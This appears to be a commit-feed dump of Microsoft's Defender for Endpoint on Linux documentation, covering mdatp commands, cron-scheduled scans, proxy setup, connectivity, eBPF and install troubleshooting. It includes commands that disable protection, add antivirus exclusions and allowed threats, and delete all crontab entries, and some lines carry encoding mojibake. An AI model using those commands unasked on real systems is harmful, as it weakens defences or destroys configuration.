-|Configuration|Turn on/off behavior monitoring|`mdatp config behavior-monitoring --value [enabled\|disabled]`
-|Configuration|Turn on/off cloud protection|`mdatp config cloud --value [enabled\|disabled]`|
-|Configuration|Turn on/off product diagnostics|`mdatp config cloud-diagnostic --value [enabled\|disabled]`|
-|Configuration|Turn on/off automatic sample submission|`mdatp config cloud-automatic-sample-submission --value [enabled\|disabled]`|
-|Configuration|Turn on/off AV passive mode|`mdatp config passive-mode --value [enabled\|disabled]`|
-|Configuration|Add/remove an antivirus exclusion for a file extension|`mdatp exclusion extension [add\|remove] --name [extension]`|
-|Configuration|Add/remove an antivirus exclusion for a file|`mdatp exclusion file [add\|remove] --path [path-to-file]`|
-|Configuration|Add/remove an antivirus exclusion for a directory|`mdatp exclusion folder [add\|remove] --path [path-to-directory]`|
-|Configuration|Add/remove an antivirus exclusion for a process|`mdatp exclusion process [add\|remove] --path [path-to-process]` <p> `mdatp exclusion process [add\|remove] --name [process-name]`|
-|Configuration|List all antivirus exclusions|`mdatp exclusion list`|
-|Configuration|Add a threat name to the allowed list|`mdatp threat allowed add --name [threat-name]`|
-|Configuration|Remove a threat name from the allowed list|`mdatp threat allowed remove --name [threat-name]`|
-|Configuration|List all allowed threat names|`mdatp threat allowed list`|
-|Configuration|Turn on PUA protection|`mdatp threat policy set --type potentially_unwanted_application --action block`|
-|Configuration|Turn off PUA protection|`mdatp threat policy set --type potentially_unwanted_application --action off`|
-|Configuration|Turn on audit mode for PUA protection|`mdatp threat policy set --type potentially_unwanted_application --action audit`|
-|Configuration|Configure degree of parallelism for on-demand scans|`mdatp config maximum-on-demand-scan-threads --value [numerical-value-between-1-and-64]`|
-|Configuration|Turn on/off scans after security intelligence updates|`mdatp config scan-after-definition-update --value [enabled/disabled]`|
-|Configuration|Turn on/off archive scanning (on-demand scans only)|`mdatp config scan-archives --value [enabled/disabled]`|
-|Configuration|Turn on/off file hash computation|`mdatp config enable-file-hash-computation --value [enabled/disabled]`|
-|Diagnostics|Change the log level|`mdatp log level set --level verbose [error|warning|info|verbose]`|
-|Diagnostics|Generate diagnostic logs|`mdatp diagnostic create --path [directory]`|
-|Diagnostics|Size limits for retained product logs|`mdatp config log-rotation-parameters [max-current-size/max-rotated-size] --size [value in MB]`|
-|Health|Check the product's health|`mdatp health`|
-|Protection|Scan a path|`mdatp scan custom --path [path] [--ignore-exclusions]`|
-|Protection|Do a quick scan|`mdatp scan quick`|
-|Protection|Do a full scan|`mdatp scan full`|
-|Protection|Cancel an ongoing on-demand scan|`mdatp scan cancel`|
-|Protection|Request a security intelligence update|`mdatp definitions update`|
-|Protection history|Print the full protection history|`mdatp threat list`|
-|Protection history|Get threat details|`mdatp threat get --id [threat-id]`|
-|Quarantine management|List all quarantined files|`mdatp threat quarantine list`|
-|Quarantine management|Remove all files from the quarantine|`mdatp threat quarantine remove-all`|
-|Quarantine management|Add a file detected as a threat to the quarantine|`mdatp threat quarantine add --id [threat-id]`|
-|Quarantine management|Remove a file detected as a threat from the quarantine|`mdatp threat quarantine remove --id [threat-id]`|
-|Quarantine management|Restore a file from the quarantine. Available in Defender for Endpoint version lower than 101.23092.0012.|`mdatp threat quarantine restore --id [threat-id] --path [destination-folder]`|
-|Quarantine management|Restore a file from the quarantine with Threat ID. Available in Defender for Endpoint version 101.23092.0012 or higher.|`mdatp threat quarantine restore threat-id --id [threat-id] --destination-path [destination-folder]`|
-|Quarantine management|Restore a file from the quarantine with Threat Original Path. Available in Defender for Endpoint version 101.23092.0012 or higher.|`mdatp threat quarantine restore threat-path --path [threat-original-path] --destination-path [destination-folder]`|
-|Endpoint Detection and Response|Set early preview |`mdatp edr early-preview [enabled\|disabled]`|
-|Endpoint Detection and Response|Set group-id|`mdatp edr group-ids --group-id [group-id]`|
-|Endpoint Detection and Response|Set / remove tag, only `GROUP` supported|`mdatp edr tag set --name GROUP --value [tag]`|
-|Endpoint Detection and Response|List exclusions (root)|`mdatp edr exclusion list [processes|paths|extensions|all]`|
-|
security Linux Schedule Scan Mde https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/linux-schedule-scan-mde.md
- Title: How to schedule scans with Microsoft Defender for Endpoint (Linux)
-description: Learn how to schedule an automatic scanning time for Microsoft Defender for Endpoint (Linux) to better protect your organization's assets.
-------- m365-security-- tier3-- mde-linux-- Previously updated : 10/22/2021--
-# Schedule scans with Microsoft Defender for Endpoint (Linux)
-
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)--
-To run a scan for Linux, see [Supported Commands](/microsoft-365/security/defender-endpoint/linux-resources#supported-commands).
-
-For Linux (and Unix), you can use a tool called **crontab** (similar to Task Scheduler in Windows) to run scheduled tasks.
-
-## Prerequisite
-
-> [!NOTE]
-> To get a list of all the time zones, run the following command:
-> `timedatectl list-timezones`<br>
-> Examples for timezones:
->
-> - `America/Los_Angeles`
-> - `America/New_York`
-> - `America/Chicago`
-> - `America/Denver`
-
-## To set the Cron job
-
-Use the following commands:
-
-### Backup crontab entries
-
-```bash
-sudo crontab -l > /var/tmp/cron_backup_200919.dat
-```
-
-> [!NOTE]
-> Where 200919 == YRMMDD
-
-> [!TIP]
-> Do this before you edit or remove.
-
-To edit the crontab, and add a new job as a root user:
-
-```bash
-sudo crontab -e
-```
-
-> [!NOTE]
-> The default editor is VIM.
-
-You might see:
-
-```outbou
-0 * * * * /etc/opt/microsoft/mdatp/logrorate.sh
-```
-
-Press "Insert"
-
-Add the following entries:
-
-```bash
-CRON_TZ=America/Los_Angeles
-
-0 2 * * sat /bin/mdatp scan quick > ~/mdatp_cron_job.log
-```
-
-> [!NOTE]
-> In this example, we have set it to 00 minutes, 2 a.m. (hour in 24 hour format), any day of the month, any month, on Saturdays. Meaning it will run Saturdays at 2:00 a.m. Pacific (UTC -8).
-
-Press "Esc"
-
-Type "`:wq`" without the double quotes.
-
-> [!NOTE]
-> w == write, q == quit
-
-To view your cron jobs, type `sudo crontab -l`
--
-#### To inspect cron job runs
-
-```bash
-sudo grep mdatp /var/log/cron
-```
-
-#### To inspect the mdatp_cron_job.log*
-
-```bash
-sudo nano mdatp_cron_job.log
-```
-
-## If you're using Ansible, Chef, Puppet, or SaltStack
-
-Use the following commands:
-
-### To set cron jobs in Ansible
-
-```bash
-cron - Manage cron.d and crontab entries
-```
-
-For more information, see [Ansible documentation](https://docs.ansible.com/ansible/latest).
-
-### To set crontabs in Chef
-
-```bash
-cron resource
-```
-
-For more information, see [Chef documentation](https://docs.chef.io/resources/cron).
-
-### To set cron jobs in Puppet
-
-```bash
-Resource Type: cron
-```
-
-See <https://puppet.com/docs/puppet/5.5/types/cron.html> for more information.
-
-**Automating with Puppet: Cron jobs and scheduled tasks**
-
-For more information, see [Puppet documentation about jobs and scheduled tasks](https://puppet.com/blog/automating-puppet-cron-jobs-and-scheduled-tasks/).
-
-### To manage cron jobs in SaltStack
-
-```bash
-Resource Type: salt.states.cron
-```
-
-**Example:**
-
-```yml
-mdatp scan quick > /tmp/mdatp_scan_log.log:
- cron.present:
- - special: '@hourly'
-```
-
-For more information, see the [Salt.States.Cron documentation](https://docs.saltproject.io/en/latest/ref/states/all/salt.states.cron.html).
-
-## Additional information
-
-### To get help with crontab
-
-```bash
-man crontab
-```
-
-### To get a list of crontab file of the current user
-
-```bash
-crontab -l
-```
-
-### To get a list of crontab file of another user
-
-```bash
-crontab -u username -l
-```
-
-### To back up crontab entries
-
-```bash
-crontab -l > /var/tmp/cron_backup.dat
-```
-
-> [!TIP]
-> Do this before you edit or remove.
-
-### To restore crontab entries
-
-```bash
-crontab /var/tmp/cron_backup.dat
-```
-
-### To edit the crontab and add a new job as a root user
-
-```bash
-sudo crontab -e
-```
-
-### To edit the crontab and add a new job
-
-```bash
-crontab -e
-```
-
-### To edit other user's crontab entries
-
-```bash
-crontab -u username -e
-```
-
-### To remove all crontab entries
-
-```bash
-crontab -r
-```
-
-### To remove other user's crontab entries
-
-```bash
-crontab -u username -r
-```
-
-### Explanation
-
-```
-+ΓÇöΓÇöΓÇöΓÇöΓÇö- minute (values: 0 - 59) (special characters: , \- \* /) <br>
-| +ΓÇöΓÇöΓÇöΓÇö- hour (values: 0 - 23) (special characters: , \- \* /) <br>
-| | +ΓÇöΓÇöΓÇö- day of month (values: 1 - 31) (special characters: , \- \* / L W C) <br>
-| | | +ΓÇöΓÇö- month (values: 1 - 12) (special characters: , \- \* /) <br>
-| | | | +ΓÇö- day of week (values: 0 - 6) (Sunday=0 or 7) (special characters: , \- \* / L W C) <br>
-| | | | |*****command to be executed
-```
security Linux Static Proxy Configuration https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/linux-static-proxy-configuration.md
- Title: Microsoft Defender for Endpoint on Linux static proxy discovery-
-description: Describes how to configure Microsoft Defender for Endpoint on Linux, for static proxy discovery.
------- m365-security-- tier3-- mde-linux-- Previously updated : 12/18/2020--
-# Configure Microsoft Defender for Endpoint on Linux for static proxy discovery
--
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-> Want to experience Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-investigateip-abovefoldlink)
-
-Microsoft Defender for Endpoint can discover a proxy server using the `HTTPS_PROXY` environment variable. This setting must be configured **both** at installation time and after the product has been installed.
-
-## Installation time configuration
-
-During installation, the `HTTPS_PROXY` environment variable must be passed to the package manager. The package manager can read this variable in any of the following ways:
--- The `HTTPS_PROXY` variable is defined in `/etc/environment` with the following line:-
- ```bash
- HTTPS_PROXY="http://proxy.server:port/"
- ```
--- The `HTTPS_PROXY` variable is defined in the package manager global configuration. For example, in Ubuntu 18.04, you can add the following line to `/etc/apt/apt.conf.d/proxy.conf`:-
- ```bash
- Acquire::https::Proxy "http://proxy.server:port/";
- ```
-
- > [!CAUTION]
- > Note that above two methods could define the proxy to use for other applications on your system. Use this method with caution, or only if this is meant to be a generally global configuration.
--- The `HTTPS_PROXY` variable is prepended to the installation or uninstallation commands. For example, with the APT package manager, prepend the variable as follows when installing Microsoft Defender for Endpoint:-
- ```bash
- HTTPS_PROXY="http://proxy.server:port/" apt install mdatp
- ```
-
- > [!NOTE]
- > Do not add sudo between the environment variable definition and apt, otherwise the variable will not be propagated.
-
-The `HTTPS_PROXY` environment variable may similarly be defined during uninstallation.
-
-Note that installation and uninstallation will not necessarily fail if a proxy is required but not configured. However, telemetry won't be submitted, and the operation could take longer due to network timeouts.
-
-## Post installation configuration
-
-After installation, configure Defender for Endpoint with a static proxy. This can be done in two ways:
-
-### 1. Using mdatp command-line tool
-
-Run the following command on the endpoint to configure proxy for Defender for Endpoint
-```bash
-mdatp config proxy set --value http://address:port
-```
-
-### 2. Using managed configuration
-
-Set the proxy in the managed configuration at `/etc/opt/microsoft/mdatp/managed/mdatp_managed.json`. This is an example of the json schema:
-```
-{
- "cloudService":{
- "proxy": "http://proxy.server:port/"
- }
-}
-```
-
-A management tool of choice can be used to deploy the above configuration. Please check [Set preferences for Microsoft Defender for Endpoint on Linux](./linux-preferences.md) for more details on managed configuration.
-
security Linux Support Connectivity https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/linux-support-connectivity.md
- Title: Troubleshoot cloud connectivity issues for Microsoft Defender for Endpoint on Linux-
-description: Learn how to troubleshoot cloud connectivity issues for Microsoft Defender for Endpoint on Linux.
------- m365-security-- tier3-- mde-linux-- Previously updated : 12/18/2020--
-# Troubleshoot cloud connectivity issues for Microsoft Defender for Endpoint on Linux
--
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-> Want to experience Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-investigateip-abovefoldlink)
-
-## Run the connectivity test
-
-To test if Defender for Endpoint on Linux can communicate to the cloud with the current network settings, run a connectivity test from the command line:
-
-```bash
-mdatp connectivity test
-```
-
-Expected output:
-
-```output
-Testing connection with https://cdn.x.cp.wd.microsoft.com/ping ... [OK]
-Testing connection with https://eu-cdn.x.cp.wd.microsoft.com/ping ... [OK]
-Testing connection with https://wu-cdn.x.cp.wd.microsoft.com/ping ... [OK]
-Testing connection with https://x.cp.wd.microsoft.com/api/report ... [OK]
-Testing connection with https://winatp-gw-cus.microsoft.com/test ... [OK]
-Testing connection with https://winatp-gw-eus.microsoft.com/test ... [OK]
-Testing connection with https://winatp-gw-weu.microsoft.com/test ... [OK]
-Testing connection with https://winatp-gw-neu.microsoft.com/test ... [OK]
-Testing connection with https://winatp-gw-ukw.microsoft.com/test ... [OK]
-Testing connection with https://winatp-gw-uks.microsoft.com/test ... [OK]
-Testing connection with https://eu-v20.events.data.microsoft.com/ping ... [OK]
-Testing connection with https://us-v20.events.data.microsoft.com/ping ... [OK]
-Testing connection with https://uk-v20.events.data.microsoft.com/ping ... [OK]
-Testing connection with https://v20.events.data.microsoft.com/ping ... [OK]
-```
-
-If the connectivity test fails, check if the device has Internet access and if [any of the endpoints required by the product](microsoft-defender-endpoint-linux.md#network-connections) are blocked by a proxy or firewall.
-
-Failures with curl error 35 or 60, indicate certificate pinning rejection. Check to see if the connection is under SSL or HTTPS inspection. If so, add Microsoft Defender for Endpoint to the allowlist.
-
-## Troubleshooting steps for environments without proxy or with transparent proxy
-
-To test that a connection isn't blocked in an environment without a proxy or with a transparent proxy, run the following command in the terminal:
-
-```bash
-curl -w ' %{url_effective}\n' 'https://x.cp.wd.microsoft.com/api/report' 'https://cdn.x.cp.wd.microsoft.com/ping'
-```
-
-The output from this command should be similar to:
-
-```Output
-OK https://x.cp.wd.microsoft.com/api/report
-OK https://cdn.x.cp.wd.microsoft.com/ping
-```
-
-## Troubleshooting steps for environments with static proxy
-
-> [!WARNING]
-> PAC, WPAD, and authenticated proxies are not supported. Ensure that only a static proxy or transparent proxy is being used.
->
-> SSL inspection and intercepting proxies are also not supported for security reasons. Configure an exception for SSL inspection and your proxy server to directly pass through data from Defender for Endpoint on Linux to the relevant URLs without interception. Adding your interception certificate to the global store will not allow for interception.
-
-If a static proxy is required, add a proxy parameter to the above command, where `proxy_address:port` correspond to the proxy address and port:
-
-```bash
-curl -x http://proxy_address:port -w ' %{url_effective}\n' 'https://x.cp.wd.microsoft.com/api/report' 'https://cdn.x.cp.wd.microsoft.com/ping'
-```
-
-Ensure that you use the same proxy address and port as configured in the `/lib/system/system/mdatp.service` file. Check your proxy configuration if there are errors from the above commands.
-
-To set the proxy for mdatp, use the following command:
-
-```bash
-mdatp config proxy set --value http://address:port
-```
--
-Upon success, attempt another connectivity test from the command line:
-
-```bash
-mdatp connectivity test
-```
-
-If the problem persists, contact customer support.
-
-## Resources
--- For more information about how to configure the product to use a static proxy, see [Configure Microsoft Defender for Endpoint for static proxy discovery](linux-static-proxy-configuration.md).
security Linux Support Ebpf https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/linux-support-ebpf.md
- Title: Use eBPF-based sensor for Microsoft Defender for Endpoint on Linux
-description: eBPF-based sensor deployment in Microsoft Defender for Endpoint on Linux.
-------- m365-security-- tier3-- mde-linux-- Previously updated : 02/12/2024--
-# Use eBPF-based sensor for Microsoft Defender for Endpoint on Linux
--
-**Applies to:**
--- [Microsoft Defender for Endpoint on Linux](microsoft-defender-endpoint-linux.md)-- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-
-The extended Berkeley Packet Filter (eBPF) for Microsoft Defender for Endpoint on Linux provides supplementary event data for Linux operating systems. eBPF can be used as an alternative technology to auditd because eBPF helps address several classes of issues seen with the auditd event provider and is beneficial in the areas of performance and system stability.
-
-Key benefits include:
--- Reduced system-wide auditd-related log noise-- Optimized system-wide event rules otherwise causing conflict between applications-- Reduced overhead for file event (file read/open) monitoring-- Improved event rate throughput and reduced memory footprint-- Optimized performance for specific configurations-
-## How eBPF works
-
-With eBPF, events previously obtained from the auditd event provider now flow from the eBPF sensor. This helps with system stability, improves CPU and memory utilization, and reduces disk usage. Also, when eBPF is enabled, all auditd-related custom rules are eliminated, which helps reduce the possibility of conflicts between applications. Data related to eBPF gets logged into the /var/log/microsoft/mdatp/microsoft_defender_core.log file.
-
-In addition, the eBPF sensor uses capabilities of the Linux kernel without requiring the use of a kernel module that helps increase system stability.
-
-> [!NOTE]
-> eBPF is used in conjunction with auditd, whereas auditd is used only for user login events and captures these events without any custom rules and flow them automatically. Be aware that auditd will be gradually removed in future versions.
-
-## System prerequisites
-
-The eBPF sensor for Microsoft Defender for Endpoint on Linux is supported on the following minimum distribution and kernel versions:
-
-| Linux Distribution | Distribution version | Kernel version |
-|--|-|-|
-| Ubuntu | 16.04 | 4.15.0 |
-| Fedora | 33 | 5.8.15 |
-| CentOS | 7.6 | 3.10.0-957.10 |
-| SLES | 15 | 5.3.18-18.47 |
-| RHEL | 7.6 | 3.10.0-957.10 |
-| Debian | 9.0 | 4.19.0 |
-| Oracle Linux RHCK | 7.9 | 3.10.0-1160 |
-| Oracle Linux UEK | 7.9 | 5.4 |
-| Amazon Linux 2 | 2 | 5.4.261-174.360|
--
-> [!NOTE]
-> Oracle Linux 8.8 with kernel version 5.15.0-0.30.20.el8uek.x86_64, 5.15.0-0.30.20.1.el8uek.x86_64 will result in kernel hang when eBPF is enabled as supplementary subsystem provider. This kernel version should not be used for eBPF mode. Refer to Troubleshooting and Diagnostics section for mitigation steps.
-
-## Use eBPF
-
-The eBPF sensor is automatically enabled for all customers by default for agent versions "101.23082.0006" and above. Customers need to update to the above-mentioned supported versions to experience the feature. When the eBPF sensor is enabled on an endpoint, Defender for Endpoint on Linux updates supplementary_events_subsystem to ebpf.
--
-In case you want to manually disable eBPF then you can run the following command:
-
-```bash
-sudo mdatp config ebpf-supplementary-event-provider --value [enabled/disabled]
-```
-You can also update the mdatp_managed.json file:
-
-```JSON
-{
- "features": {
- "ebpfSupplementaryEventProvider": "disabled"
- }
-}
-```
-Refer to the link for detailed sample json file - [Set preferences for Microsoft Defender for Endpoint on Linux.](linux-preferences.md)
-> [!IMPORTANT]
-> If you disable eBPF, the supplementary event provider switches back to auditd.
-> In the event eBPF doesn't become enabled or is not supported on any specific kernel, it will automatically switch back to auditd and retain all auditd custom rules.
-
-You can also check the status of eBPF (enabled/disabled) on your linux endpoints using advanced hunting in the Microsoft Defender Portal. Steps are as follows:
-
-1. Go to the [Microsoft Defender portal](https://security.microsoft.com) and sign in.
-
-2. In the navigation pane, go to **Hunting** > **Advanced hunting**.
-
-3. Under **Advanced hunting**, go to **Defender Vulnerability Management**.
-
-4. Run the following query: `DeviceTvmInfoGathering`.
-
-5. In the output, in the **Additional fields** column, select **Show more**, and then look for **EBPF STATUS: true**.
-
-## Immutable mode of Auditd
-
-For customers using auditd in immutable mode, a reboot is required post enablement of eBPF in order to clear the audit rules added by Microsoft Defender for Endpoint. This is a limitation in immutable mode of auditd, which freezes the rules file and prohibits editing/overwriting. This issue is resolved with the reboot.
-Post reboot, run the below command to check if audit rules got cleared.
-
-```bash
-% sudo auditctl -l
-```
-
-The output of above command should show no rules or any user added rules. In case the rules didn't get removed, then perform the following steps to clear the audit rules file.
-
-1. Switch to ebpf mode
- 2. Remove the file /etc/audit/rules.d/mdatp.rules
- 3. Reboot the machine
-
-### Troubleshooting and Diagnostics
-
-You can check the agent health status by running the `mdatp` health command. Make sure that the eBPF sensor for Defender for Endpoint on Linux is supported by checking the current kernel version by using the following command line:
-
-```bash
-uname -a
-```
-
-#### Known Issues
-
-1. Enabling eBPF on RHEL 8.1 version with SAP might result in kernel panic. To mitigate this issue, you can take one of the following steps:
-
- - Use a distro version higher than RHEL 8.1.
- - Switch to auditd mode if you need to use RHEL 8.1 version.
-
-2. Using Oracle Linux 8.8 with kernel version **5.15.0-0.30.20.el8uek.x86_64, 5.15.0-0.30.20.1.el8uek.x86_64** might result in kernel panic. To mitigate this issue, you can take one of the following steps:
-
- - Use a kernel version higher or lower than **5.15.0-0.30.20.el8uek.x86_64, 5.15.0-0.30.20.1.el8uek.x86_64** on Oracle Linux 8.8 if you want to use eBPF as supplementary subsystem provider. Note that the minimum kernel version for Oracle Linux is RHCK 3.10.0 and Oracle Linux UEK is 5.4.
- - Switch to auditd mode if you need to use the same kernel version
-
-```bash
-sudo mdatp config ebpf-supplementary-event-provider --value disabled
-```
-
-The following two sets of data help analyze potential issues and determine the most effective resolution options.
-
-1. Collect a diagnostic package from the client analyzer tool by using the following instructions: [Troubleshoot performance issues for Microsoft Defender for Endpoint on Linux](linux-support-perf.md).
-
-2. Collect a debug diagnostic package when Defender for Endpoint is utilizing high resources by using the following instructions: [Microsoft Defender for Endpoint on Linux resources](linux-resources.md#collect-diagnostic-information).
-
-#### Troubleshooting performance issues
-
-If you see a hike in resource consumption by Microsoft Defender on your endpoints, it's important to identify the process/mount-point/files that is consuming most CPU/Memory utilization and then apply necessary exclusions. After applying possible AV exclusions, if wdavdaemon (parent process) is still consuming the resources, then use the ebpf-statistics command to obtain the top system call count:
-
-```Bash
-sudo mdatp diagnostic ebpf-statistics
-```
-
-```Output
-Output
-Monitor 20 seconds
-Top file paths:
-/var/log/microsoft/mdatp/microsoft_defender.log : 10
-/var/log/microsoft/mdatp/rotated/microsoft_defender.log00001 : 2
-/var/log/microsoft/mdatp/rotated/microsoft_defender.log : 1
-/home/gargank/tmp-stress-ng-rename-13550-31/stress-ng-rename-13550-31-374993 : 1
-/home/gargank/tmp-stress-ng-rename-13550-31/stress-ng-rename-13550-31-374991 : 1
-/home/gargank/tmp-stress-ng-rename-13550-31/stress-ng-rename-13550-31-374989 : 1
-/home/gargank/tmp-stress-ng-rename-13550-31/stress-ng-rename-13550-31-374987 : 1
-/home/gargank/tmp-stress-ng-rename-13550-31/stress-ng-rename-13550-31-374985 : 1
-/home/gargank/tmp-stress-ng-rename-13550-31/stress-ng-rename-13550-31-374983 : 1
-/home/gargank/tmp-stress-ng-rename-13550-31/stress-ng-rename-13550-31-374981 : 1
-
-Top initiator paths:
-/usr/bin/stress-ng : 50000
-/opt/microsoft/mdatp/sbin/wdavdaemon : 13
-
-Top syscall ids:
-82 : 1699333
-90 : 10
-87 : 3
-```
-
-In the above output, you can see that stress-ng is the top process generating large number of events and might result into performance issues. Most likely stress-ng is generating the system call with ID 82. You can create a ticket with Microsoft to get this process excluded. In future as part of upcoming enhancements, you have more control to apply such exclusions at your end.
-
-Exclusions applied to auditd can't be migrated or copied to eBPF. Common concerns such as noisy logs, kernel panic, noisy syscalls are already taken care of by eBPF internally. In case you want to add any further exclusions, then reach out to Microsoft to get the necessary exclusions applied.
-
-## See also
--- [Troubleshoot performance issues for Microsoft Defender for Endpoint on Linux](linux-support-perf.md)-- [Microsoft Defender for Endpoint on Linux resources](linux-resources.md#collect-diagnostic-information)
security Linux Support Events https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/linux-support-events.md
- Title: Troubleshoot missing events or alerts issues for Microsoft Defender for Endpoint on Linux
-description: Troubleshoot missing events or alerts issues in Microsoft Defender for Endpoint on Linux.
-------- m365-security-- tier3-- mde-linux--- Previously updated : 02/02/2021--
-# Troubleshoot missing events or alerts issues for Microsoft Defender for Endpoint on Linux
--
-**Applies to:**
--- [Microsoft Defender for Endpoint on Linux](microsoft-defender-endpoint-linux.md)-- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-
-This article provides some general steps to mitigate missing events or alerts in the <a href="https://go.microsoft.com/fwlink/p/?linkid=2077139" target="_blank">Microsoft Defender portal</a>.
-
-Once **Microsoft Defender for Endpoint** has been installed properly on a device, a _device page_ will be generated in the portal. You can review all recorded events in the timeline tab in the device page, or in advanced hunting page. This section troubleshoots the case of some or all expected events are missing.
-For instance, if all _CreatedFile_ events are missing.
-
-## Missing network and login events
-
-Microsoft Defender for Endpoint utilized `audit` framework from linux to track network and login activity.
-
-1. Make sure audit framework is working.
-
- ```bash
- service auditd status
- ```
-
- expected output:
-
- ```output
- ΓùÅ auditd.service - Security Auditing Service
- Loaded: loaded (/usr/lib/systemd/system/auditd.service; enabled; vendor preset: enabled)
- Active: active (running) since Mon 2020-12-21 10:48:02 IST; 2 weeks 0 days ago
- Docs: man:auditd(8)
- https://github.com/linux-audit/audit-documentation
- Process: 16689 ExecStartPost=/sbin/augenrules --load (code=exited, status=1/FAILURE)
- Process: 16665 ExecStart=/sbin/auditd (code=exited, status=0/SUCCESS)
- Main PID: 16666 (auditd)
- Tasks: 25
- CGroup: /system.slice/auditd.service
- Γö£ΓöÇ16666 /sbin/auditd
- Γö£ΓöÇ16668 /sbin/audispd
- Γö£ΓöÇ16670 /usr/sbin/sedispatch
- ΓööΓöÇ16671 /opt/microsoft/mdatp/sbin/mdatp_audisp_plugin -d
- ```
-
-2. If `auditd` is marked as stopped, start it.
-
- ```bash
- service auditd start
- ```
-
-**On SLES** systems, SYSCALL auditing in `auditd` might be disabled by default and can be accounted for missing events.
-
-1. To validate that SYSCALL auditing is not disabled, list the current audit rules:
-
- ```bash
- sudo auditctl -l
- ```
-
- if the following line is present, remove it or edit it to enable Microsoft Defender for Endpoint to track specific SYSCALLs.
-
- ```output
- -a task, never
- ```
-
- audit rules are located at `/etc/audit/rules.d/audit.rules`.
-
-## Missing file events
-
-File events are collected with `fanotify` framework. In case some or all file events are missing, make sure `fanotify` is enabled on the device and that the file system is [supported](microsoft-defender-endpoint-linux.md#system-requirements).
-
-List the filesystems on the machine with:
-
-```bash
-df -Th
-```
security Linux Support Install https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/linux-support-install.md
- Title: Troubleshoot installation issues for Microsoft Defender for Endpoint on Linux-
-description: Troubleshoot installation issues for Microsoft Defender for Endpoint on Linux.
------- m365-security-- tier3-- mde-linux-- Previously updated : 12/18/2020--
-# Troubleshoot installation issues for Microsoft Defender for Endpoint on Linux
--
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-> Want to experience Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-investigateip-abovefoldlink)
-
-## Verify that the installation succeeded
-
-An error in installation might or might not result in a meaningful error message by the package manager. To verify if the installation succeeded, obtain and check the installation logs using:
-
-```bash
- sudo journalctl --no-pager|grep 'microsoft-mdatp' > installation.log
-```
-
-```bash
- grep 'postinstall end' installation.log
-```
-
-```Output
- microsoft-mdatp-installer[102243]: postinstall end [2020-03-26 07:04:43OURCE +0000] 102216
-```
-
-An output from the previous command with correct date and time of installation indicates success.
-
-Also check the [Client configuration](linux-install-manually.md#client-configuration) to verify the health of the product and detect the EICAR text file.
-
-## Make sure you have the correct package
-
-Verify that the package you're installing matches the host distribution and version.
-
-<br>
-
-****
-
-|package|distribution|
-|||
-|mdatp-rhel8.Linux.x86_64.rpm|Oracle, RHEL, and CentOS 8.x|
-|mdatp-sles12.Linux.x86_64.rpm|SUSE Linux Enterprise Server 12.x|
-|mdatp-sles15.Linux.x86_64.rpm|SUSE Linux Enterprise Server 15.x|
-|mdatp.Linux.x86_64.rpm|Oracle, RHEL, and CentOS 7.x|
-|mdatp.Linux.x86_64.deb|Debian and Ubuntu 16.04, 18.04 and 20.04|
-|
-
-For [manual deployment](linux-install-manually.md), make sure the correct distro and version are selected.
-
-## Installation failed due to dependency error
-
-If the Microsoft Defender for Endpoint installation fails due to missing dependencies errors, you can manually download the prerequisite dependencies.
-
-The following external package dependencies exist for the mdatp package:
--- The mdatp RPM package requires `glibc >= 2.17`, `audit`, `policycoreutils`, `semanage`, `selinux-policy-targeted`, `mde-netfilter` -- For RHEL6 the mdatp RPM package requires `audit`, `policycoreutils`, `libselinux`, `mde-netfilter` -- For DEBIAN the mdatp package requires `libc6 >= 2.23`, `uuid-runtime`, `auditd`, `mde-netfilter` -
-The mde-netfilter package also has the following package dependencies:
--- For DEBIAN the mde-netfilter package requires `libnetfilter-queue1`, `libglib2.0-0` -- For RPM the mde-netfilter package requires `libmnl`, `libnfnetlink`, `libnetfilter_queue`, `glib2` -
-## Installation failed
-
-Check if the Defender for Endpoint service is running:
-
-```bash
-service mdatp status
-```
-
-```Output
- ΓùÅ mdatp.service - Microsoft Defender for Endpoint
